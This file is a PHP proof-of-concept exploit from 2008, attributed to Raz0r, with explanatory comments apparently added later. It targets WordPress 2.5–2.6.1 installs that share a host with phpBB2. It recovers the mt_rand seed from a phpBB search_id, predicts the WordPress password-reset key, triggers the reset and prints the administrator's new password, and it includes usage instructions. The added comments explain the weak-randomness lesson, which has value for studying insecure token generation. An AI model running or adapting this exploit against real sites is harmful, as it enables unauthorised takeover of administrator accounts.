<?php
// Proof-of-concept from 2008 for a password-reset weakness in old WordPress
// releases (2.5 - 2.6.1 per the banner) when a phpBB2 install shares the host.
// Flow, as the statements below show it: fetch wp-login.php, optionally compare
// PHP versions, obtain a phpBB search_id, send a lost-password request on the
// same keep-alive socket, recover the mt_srand() seed that produced the
// search_id, and replay WordPress' mt_rand()-based password generator to
// predict the reset key and the new password.
// Defensive lesson: reset tokens and passwords were derived from mt_rand(),
// whose seed is brute-forced here over 0..1,000,000 (see search_seed()). Any
// security-relevant token must come from a CSPRNG (random_bytes()/random_int()
// in current PHP), and raw mt_rand() outputs should never be exposed to clients.
echo "------------------------------------------------------------------\n";
echo "Wordpress 2.5 <= 2.6.1 through phpBB2 Reset Admin Password Exploit\n";
echo "(c)oded by Raz0r (http://Raz0r.name/)\n";
echo "------------------------------------------------------------------\n";

// Usage text; at least two positional arguments (WordPress URL, phpBB URL) are required.
if ($_SERVER['argc']<3) {
	echo "USAGE:\n";
	echo "~~~~~~\n";
	echo "php {$_SERVER['argv'][0]} [wp] [phpbb] OPTIONS\n\n";
	echo "[wp]    - target server where Wordpress is installed\n";
	echo "[phpbb] - path to phpBB (must be located on the same server)\n\n";
	echo "OPTIONS:\n";
	echo "--wp_user=[value] (default: admin)\n";
	echo "--search=[value] (default: `site OR file`)\n";
	echo "--skipcheck (force exploit not to compare PHP versions)\n";
	echo "examples:\n";
	echo "php {$_SERVER['argv'][0]} http://site.com/blog/ http://site.com/forum/\n";
	echo "php {$_SERVER['argv'][0]} http://site.com/blog/ http://samevhost.com/forum/ --wp_user=lol\n";
	die;
}

// No execution-time limit (the seed search can take a while); 10 s socket timeout.
set_time_limit(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",10);

$wp = $_SERVER['argv'][1];
$phpbb = $_SERVER['argv'][2];

// Option parsing. Note the strpos() !== false test matches the flag anywhere in
// the argument, and explode() on "=" keeps only the part after the first "=".
for($i=3;$i<$_SERVER['argc'];$i++){
	if(strpos($_SERVER['argv'][$i],"--wp_user=")!==false) {
		list(,$wp_user) = explode("=",$_SERVER['argv'][$i]);
	}
	if (strpos($_SERVER['argv'][$i],"--search=")!==false) {
		list(,$search) = explode("=",$_SERVER['argv'][$i]);
	}

	if (strpos($_SERVER['argv'][$i],"--skipcheck")!==false) {
		$skipcheck=true;
	}
}

if(!isset($wp_user))$wp_user='admin';
if(!isset($search))$search='site OR file';

// Both URLs must parse and resolve to the same IP; the technique only works when
// both applications are served from the same host.
$wp_parts = @parse_url($wp);
$phpbb_parts = @parse_url($phpbb);

if(isset($wp_parts['host']))$wp_ip = gethostbyname($wp_parts['host']);else die("[-] Wrong parameter given\n");
if(isset($phpbb_parts['host']))$phpbb_ip = gethostbyname($phpbb_parts['host']);else die("[-] Wrong parameter given\n");

if($wp_ip!=$phpbb_ip) die("[-] Web apps must be located on the same server\n");

// Normalise host/port/path for phpBB; port defaults to 80 and the path always ends in "/".
$phpbb_host = $phpbb_parts['host'];
if(isset($phpbb_parts['port']))$phpbb_port=$phpbb_parts['port']; else $phpbb_port=80;
if(isset($phpbb_parts['path']))$phpbb_path=$phpbb_parts['path']; else $phpbb_path="/";
if(substr($phpbb_path,-1,1)!="/")$phpbb_path .= "/";

// Same normalisation for WordPress.
$wp_host = $wp_parts['host'];
if(isset($wp_parts['port']))$wp_port=$wp_parts['port']; else $wp_port=80;
if(isset($wp_parts['path']))$wp_path=$wp_parts['path']; else $wp_path="/";
if(substr($wp_path,-1,1)!="/")$wp_path .= "/";

// First connection: plain HTTP/1.0 GET of wp-login.php (sent to the shared IP
// with the WordPress Host header). Only this first fsockopen() is checked for failure.
echo "[~] Connecting... ";
$sock = fsockopen($phpbb_ip,$phpbb_port);
if(!$sock)die("failed\n"); else echo "OK\n";


$packet = "GET {$wp_path}wp-login.php HTTP/1.0\r\n";
$packet.= "Host: {$wp_host}\r\n";
$packet.= "Connection: close\r\n\r\n";
$resp='';
fputs($sock,$packet);
while(!feof($sock)) {
	$resp.=fgets($sock);
}
fclose($sock);


// Require a 200 response. A versioned "login.css?ver=..." link is taken as the
// marker for the 2.6-style password generator ($wp26); otherwise the older
// 7-character generator is assumed.
if(preg_match('@HTTP/1\.(0|1) 200 OK@i',$resp)){
	if(preg_match('@login\.css\?ver=([\d\.]+)\'@',$resp)) $wp26=true;
	else $wp26=false;
} else die("[-] Can't obtain wp-login.php\n");

// Unless --skipcheck was given, compare the server's PHP version (from the
// X-Powered-By header) with the local one. version_compare() returns -1/0/1 and
// is used here as a boolean, so the test only distinguishes "exactly 5.2.6"
// from "not 5.2.6" on each side; presumably a same-side-of-5.2.6 check was intended
// (mt_rand output differs across PHP releases, so local replay must match the server).
if(!isset($skipcheck)) {
	echo "[~] Comparing PHP versions... ";
	$out=array();
	preg_match('@x-powered-by: *PHP/([\d\.]+)@i',$resp,$out);
	if(!isset($out[1]))die( "failed\n[-] Can't get PHP version\n");
	else {
		if(!(version_compare($out[1],'5.2.6') && version_compare(phpversion(),'5.2.6')) && !(!version_compare($out[1],'5.2.6') && !version_compare(phpversion(),'5.2.6')) ) {
			die("failed\n[-] Server's and local PHP versions are unacceptable\n");
		}
	}
	echo "OK\n";
}

// Second connection, kept alive for the next three requests. Its return value
// is not checked: a failed connect would surface later as fputs()/fgets() warnings.
$ock = fsockopen($phpbb_ip,$phpbb_port);
echo "[~] Sending request to $phpbb\n";

// phpBB search POST. The response is expected to contain a search_id, which the
// script treats as a raw mt_rand() output.
$data = "search_keywords=".urlencode($search)."&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=all&search_cat=-1&sort_by=0&sort_dir=DESC&show_results=topics&return_chars=200";
$packet = "POST {$phpbb_path}search.php?mode=results HTTP/1.1\r\n";
$packet.= "Host: {$phpbb_host}\r\n";
$packet.= "Connection: keep-alive\r\n";
$packet.= "Keep-alive: 300\r\n";
$packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet.= "Content-Length: ".strlen($data)."\r\n\r\n";
$packet.= $data;

fputs($ock, $packet);
sleep(5);

// Read the response line by line until a search_id shows up. preg_match() reuses
// $search (the search term) as its matches array; the term is not needed after
// this point, so the clobbering is harmless but confusing.
$resp='';
while(!feof($ock)) {
	$resp = fgets($ock);
	preg_match('@search.php\?search_id=(\d+)&amp;@',$resp,$search);
	if(isset($search[1])) {
		$search_id = (int)$search[1];
		echo "[+] search_id is $search_id\n";
		break;
	}
}

if(!isset($search_id)) die("[-] search_id Not Found, try the other --search param\n");

echo "[~] Sending request to $wp\n";

// Lost-password POST on the SAME socket. The keep-alive is presumably meant to
// have the same server process (and thus the same mt_rand() state) handle this
// request as the search above; the script does not verify that.
$data = "user_login=".urlencode($wp_user)."&wp-submit=Get+New+Password";

// Referer is built from the raw $wp argument plus "/", so a trailing slash in
// $wp yields "//wp-login.php"; cosmetic only.
$packet = "POST {$wp_path}wp-login.php?action=lostpassword HTTP/1.1\r\n";
$packet.= "Host: {$wp_host}\r\n";
$packet.= "Connection: keep-alive\r\n";
$packet.= "Keep-alive: 300\r\n";
$packet.= "Referer: {$wp}/wp-login.php?action=lostpassword\r\n";
$packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet.= "Content-Length: ".strlen($data)."\r\n\r\n";
$packet.= $data;

fputs($ock,$packet);

// Recover the seed whose first mt_rand() output equals search_id, reseed the
// local generator with it and discard one output (the one that became
// search_id, presumably), so the following calls replay the server's sequence.
$seed = search_seed($search_id);
if($seed!==false) echo "[+] Seed is $seed\n";
else die("[-] Seed Not Found\n");
mt_srand($seed);
mt_rand();

// Predicted reset key: 20 alphanumerics for the 2.6 generator, 7 for the older one.
if($wp26) $key = wp26_generate_password(20, false);
else  $key = wp_generate_password();

// NOTE(review): this literal looks truncated (a backslash followed by a line
// break, probably "\n" in the original); left byte-identical here.
echo "[+] Activation key should be $key\
";

echo "[~] Sending request to activate password reset\n";

// Third request on the same socket: trigger the reset with the predicted key.
$packet = "GET {$wp_path}wp-login.php?action=rp&key={$key} HTTP/1.1\r\n";
$packet.= "Host: {$wp_host}\r\n";
$packet.= "Connection: close\r\n\r\n";

fputs($ock,$packet);

// $resp still holds the last line read in the search_id loop; the remaining
// response body is appended to it rather than to a fresh buffer.
while(!feof($ock)) {
	$resp .= fgets($ock);
}

// Failure detection on the combined response: unknown-user messages (English
// and Russian localisations) and WordPress' invalid-key redirect.
if(preg_match('/(Invalid username or e-mail)|(пользователь отсутствует в базе данных)|(Неправильное имя пользователя)/i',$resp)) die("[-] Incorrect username for wordpress\n");
if(strpos($resp,'error=invalidkey')!==false) die("[-] Activation key is incorrect\n");

// The new password is the next output of the same generator sequence.
if($wp26) $pass = wp26_generate_password();
else  $pass = wp_generate_password();

echo "[+] New password should be $pass\n";

/**
 * Find the mt_srand() seed in 0..1,000,000 (inclusive) whose first mt_rand()
 * output loosely equals $rand_num.
 *
 * Every candidate reseeds the process-wide Mersenne Twister state, so callers
 * must reseed afterwards. The small search space is exactly why values derived
 * from mt_rand() are predictable and unsuitable as security tokens.
 *
 * @param int $rand_num observed first mt_rand() output
 * @return int|false lowest matching seed, or false when none in range matches
 */
function search_seed($rand_num) {
	$candidate = 0;
	while ($candidate <= 1000000) {
		mt_srand($candidate);
		if (mt_rand() == $rand_num) {
			return $candidate;
		}
		$candidate++;
	}
	return false;
}

/**
 * Local copy of the WordPress 2.6-era password generator (name and signature
 * suggest so): $length characters drawn with mt_rand() from a-z, A-Z, 0-9 and,
 * when $special_chars is true, "!@#$%^&*()".
 *
 * The output is fully determined by the current mt_rand() state, which is what
 * makes such passwords/keys predictable once the seed is known.
 *
 * @param int  $length        number of characters to produce
 * @param bool $special_chars whether to include the ten punctuation characters
 * @return string
 */
function wp26_generate_password($length = 12, $special_chars = true) {
	$alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
		. ($special_chars ? '!@#$%^&*()' : '');
	$lastIndex = strlen($alphabet) - 1;

	$out = '';
	for ($n = 0; $n < $length; $n++) {
		$out .= $alphabet[mt_rand(0, $lastIndex)];
	}
	return $out;
}

/**
 * Local copy of the older (pre-2.6) WordPress password generator: seven
 * characters drawn with mt_rand() from a-z, A-Z, 0-9 (62 symbols).
 *
 * Like wp26_generate_password(), the result is a pure function of the current
 * mt_rand() state and therefore predictable once the seed is recovered.
 *
 * @return string seven-character alphanumeric string
 */
function wp_generate_password() {
	$alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
	$out = '';
	foreach (range(1, 7) as $unused) {
		$out .= $alphabet[mt_rand(0, 61)];
	}
	return $out;
}
?>